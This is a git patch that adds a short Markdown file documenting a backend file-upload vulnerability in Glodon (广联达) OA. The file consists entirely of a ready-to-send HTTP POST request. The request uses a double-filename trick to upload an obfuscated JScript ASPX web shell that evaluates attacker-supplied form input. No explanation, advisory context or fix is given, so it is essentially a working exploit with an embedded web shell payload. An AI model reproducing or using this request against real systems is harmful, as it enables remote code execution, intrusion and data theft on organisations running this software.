From d132e7e2f9b92a7b7795730529996151be3a7864 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 22:03:38 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=B9=BF=E8=81=94=E8=BE=BEoa=20?=
 =?UTF-8?q?=E5=90=8E=E5=8F=B0=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 广联达oa 后台文件上传漏洞.md | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 广联达oa 后台文件上传漏洞.md

diff --git a/广联达oa 后台文件上传漏洞.md b/广联达oa 后台文件上传漏洞.md
new file mode 100644
index 0000000..2018271
--- /dev/null
+++ b/广联达oa 后台文件上传漏洞.md	
@@ -0,0 +1,32 @@
+## 广联达oa 后台文件上传漏洞
+
+```
+POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
+Host: 10.10.10.1:8888
+X-Requested-With: Ext.basex
+Accept: text/html, application/xhtml+xml, image/jxr, */*
+Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
+Accept: */*
+Origin: http://10.10.10.1
+Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
+Cookie: 
+Connection: close
+Content-Length: 421
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj
+Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
+Content-Type: application/text
+
+<%@ Page Language="Jscript" Debug=true%>
+<%
+var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
+var GFMA=Request.Form("qmq1");
+var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
+eval(GFMA, ONOQ);
+%>
+
+------WebKitFormBoundaryFfJZ4PlAZBixjELj--
+```